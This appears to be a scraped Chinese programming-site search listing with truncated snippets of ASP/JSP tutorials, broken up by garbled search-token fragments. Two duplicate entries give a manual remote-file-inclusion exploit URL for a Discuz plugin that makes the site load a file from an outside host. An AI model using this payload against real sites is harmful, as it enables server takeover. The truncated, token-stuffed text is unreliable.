搜索列表
-
如何远程读取数据库页面?
【编程10000问】<%Set HttpObj = Server.CreateObject("AspHTTP.Conn")dim docnumdocnum = 101do while docnum <> 111 Response.Write docnumHTTPObj.Url = "http://www.intels.net/date.asp?songID="&docnumHttpObj.RequestMethod = "GET"strResult = HTTPObj.GetURLRes...
|如何|何远|远程|程读|读取|取数|数据|据库|库页|页面|面?|?| -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
MusicGet 类
【ASP编程】复制代码 代码如下:<% Response.Expires = 0 Response.expiresabsolute = Now() - 1 Response.addHeader "pragma", "no-cache" Response.addHeader "cache-control", "private" Respons...
MusicGet类 -
巧用FileSystem组件实现WEB应用中的本地特定打印
【ASP编程】1、引言 随着Internet的飞速发展,许多企业都纷纷开发基于WEB的业务应用系统。一般情况下,基于WEB的业务应用都采用三层或三层以上的结构,前台即客户端是普通的WEB浏览器,中间业务逻辑应用层存放于WEB服务器上,由WEB服务器上的服务构件访问后台数据库。为了业务系统与Internet的互联,WEB服务器和数据库系...
|巧用|用F|Fi|il|le|eS|Sy|ys|st|te|em|m组|组件|件实|实现|现W|WE|EB|B应|应用|用中|中的|的本|本地|地特|特定|定 -
一个简单的HTML病毒分析
【ASP编程】一直就想写这篇东西了,只是上班时说要上班,不写,回家后又忙着玩游戏,丢一边去了。现在只好不务正业的开写了,希望头儿不会知道我的blog。哈哈 在很久之前就对HTML的病毒很感兴趣了,很好奇怎么能远程向本地不经过允许就能下载可执行文件的,只是一直没机会搞得到ASP的原码,所以不才敢断章取义的去作什么分析。最...
|一个|个简|简单|单的|的H|HT|TM|ML|L病|病毒|毒分|分析|析| -
IBM HTTP Server 远程溢出漏洞
【JSP编程】涉及程序: GET 描述: 通过提交超长的GET请求导致IBM HTTP Server远程溢出详细: IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用...
|IB|BM|MH|HT|TT|TP|PS|Se|er|rv|ve|er|r远|远程|程溢|溢出|出漏|漏洞|洞| -
二、设置开发、运行环境
【JSP编程】2.1 安装Servlet和JSP开发工具 要学习Servlet和JSP开发,首先你必须准备一个符合Java Servlet 2.1/2.2和JavaServer Pages1.0/1.1规范的开发环境。Sun提供免费的JavaServer Web Development Kit(JSWDK),可以从http://java.sun.com/products/servlet/下载。 安装好JSWDK之后,你还要...
|二、|、设|设置|置开|开发|发、|、运|运行|行环|环境|境| -
七、HTTP应答状态
【JSP编程】7.1 状态代码概述 Web服务器响应浏览器或其他客户程序的请求时,其应答一般由以下几个部分组成:一个状态行,几个应答头,一个空行,内容文档。下面是一个最简单的应答: HTTP/1.1 200 OKContent-Type: text/plainHello World 状态行包含HTTP版本、状态代码、与状态代码对应的简短说明信息。在大多数情...
|七、|、H|HT|TT|TP|P应|应答|答状|状态|态| -
JDBCTM 指南:入门2 - 连接
【JSP编程】内容: 2 - 连接本概述是从《JDBCTM Database Access from JavaTM: A Tutorialand Annotated Reference 》这本书中摘引来的。JavaSoft 目前正在准备这本书。这本书是一本教程,同时也是 JDBC 的重要参考手册,它将作为 Java 系列的组成部份在 1997 年春季由 Addison-Wesley 出版公司出版。2.1 概述Con...
|JD|DB|BC|CT|TM|M指|指南|南入|入门|门2|2连|连接|接| -
JDBCTM 指南:入门
【JSP编程】本简介是从《JDBCTM Database Access from JavaTM: A Tutorial and Annotated Reference 》这本书中摘引来的。JavaSoft 目前正在准备这本书。这是一本教程,同时也是 JDBC 的重要参考手册,它将作为 Java 系列的组成部份在 1997 年春季由 Addison-Wesley 出版公司出版。 1.1 什么是 JDBCTM? J...
|JD|DB|BC|CT|TM|M指|指南|南入|入门|门| -
JDBCTM 指南:入门3 - DriverManager
【JSP编程】内容: 3 - DriverManager3.1 概述DriverManager 类是 JDBC 的管理层,作用于用户和驱动程序之间。它跟踪可用的驱动程序,并在数据库和相应驱动程序之间建立连接。另外,DriverManager 类也处理诸如驱动程序登录时间限制及登录和跟踪消息的显示等事务。对于简单的应用程序,一般程序员需要在此类中直接使用的唯一方法是...
|JD|DB|BC|CT|TM|M指|指南|南入|入门|门3|3D|Dr|ri|iv|ve|er|rM|Ma|an|na|ag|ge|er|r|
